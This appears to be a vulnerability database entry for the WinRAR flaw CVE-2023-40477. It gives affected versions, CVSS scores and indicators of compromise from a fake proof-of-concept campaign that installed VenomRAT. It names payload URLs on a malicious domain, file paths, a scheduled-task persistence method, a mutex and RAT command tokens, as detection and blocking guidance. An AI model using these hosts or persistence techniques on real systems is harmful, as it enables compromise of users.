cbcvebase.
CVE-2023-40477
published 2024-05-03

CVE-2023-40477: RARLAB WinRAR Recovery Volume Improper Validation of Array Index Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute…

PriorityP351high7.8CVSS 3.0
AVLACLPRNUIRSUCHIHAH
EPSS
13.08%
95.9th percentile
RARLAB WinRAR Recovery Volume Improper Validation of Array Index Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of RARLAB WinRAR. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of recovery volumes. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-21233.

Affected

11 ranges
VendorProductVersion rangeFixed in
debianlibclamunrar< libclamunrar 1.0.3-1~deb12u1 (bookworm)libclamunrar 1.0.3-1~deb12u1 (bookworm)
debianrar< libclamunrar 1.0.3-1~deb12u1 (bookworm)libclamunrar 1.0.3-1~deb12u1 (bookworm)
debianunrar-nonfree< libclamunrar 1.0.3-1~deb12u1 (bookworm)libclamunrar 1.0.3-1~deb12u1 (bookworm)
rarlabrar>= 0 < 2:6.23-1~deb11u12:6.23-1~deb11u1
rarlabrar>= 0 < 2:6.23-1~deb12u12:6.23-1~deb12u1
rarlabrar>= 0 < 2:6.23-12:6.23-1
rarlabrar>= 0 < 2:6.23-12:6.23-1
rarlabrar>= 0 < 2:6.23-1~20.04.12:6.23-1~20.04.1
rarlabrar>= 0 < 2:6.23-1~22.04.12:6.23-1~22.04.1
rarlabwinrar< 6.236.23
rarlabwinrar

Detection & IOCsextracted from sources · hover to see the quote

domaincheckblacklistwords[.]eu
urlcheckblacklistwords[.]eu/c.txt
urlcheckblacklistwords[.]eu/words.txt
urlhttp://checkblacklistwords[.]eu/list.txt
path%TEMP%/bat.bat
path%TEMP%\c.ps1
path%APPDATA%\Drivers\Windows.Gaming.Preview.exe
filenameWindows.Gaming.Preview.exe
filenamepoc.py
filenameCVE-2023-40477-main.zip
mutexfqziwqjwgwzscvfy
otherWindows.Gaming.Preview (scheduled task, runs every 3 minutes)
hash82cb695f463b93b9cc089253cd6b5e32dce46c35
  • Hunt for a scheduled task named 'Windows.Gaming.Preview' executing %APPDATA%\Drivers\Windows.Gaming.Preview.exe every 3 minutes — this is the VenomRAT persistence mechanism.
  • VenomRAT C2 beacon identification: look for the mutex value 'fqziwqjwgwzscvfy' in process memory or handle listings on infected hosts.
  • Monitor for PowerShell downloading from checkblacklistwords[.]eu/c.txt and checkblacklistwords[.]eu/words.txt as second- and third-stage payload retrieval steps.
  • VenomRAT keylogger writes keystrokes to a locally stored text file under %APPDATA%; look for unexpected .txt files in that directory alongside the Windows.Gaming.Preview.exe binary.
  • Detect VenomRAT C2 commands in network traffic: strings 'plu_gin', 'HVNCStop', 'loadofflinelog', 'save_Plugin', 'runningapp', 'keylogsetting', 'init_reg', 'Po_ng', 'filterinfo' are distinctive RAT command tokens.
  • CVE-2023-40477 is triggered by opening a specially crafted RAR recovery volume; detection should focus on WinRAR processing .rev (recovery volume) files from untrusted sources, particularly versions prior to 6.23.
  • ·The fake PoC GitHub repository (whalersplonk) and the Streamable demonstration video are no longer available; the infection chain URLs on checkblacklistwords[.]eu may also be inactive, but the domain should still be blocked.
  • ·The poc.py script itself terminates with an exception before completing, but the malicious payload download and execution code runs successfully before the crash — do not assume a failed script execution means no infection occurred.

CVSS provenance

nvdv3.07.8HIGHCVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
osv7.8HIGH
vendor_debian7.8HIGH
vendor_ubuntu7.5HIGH
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.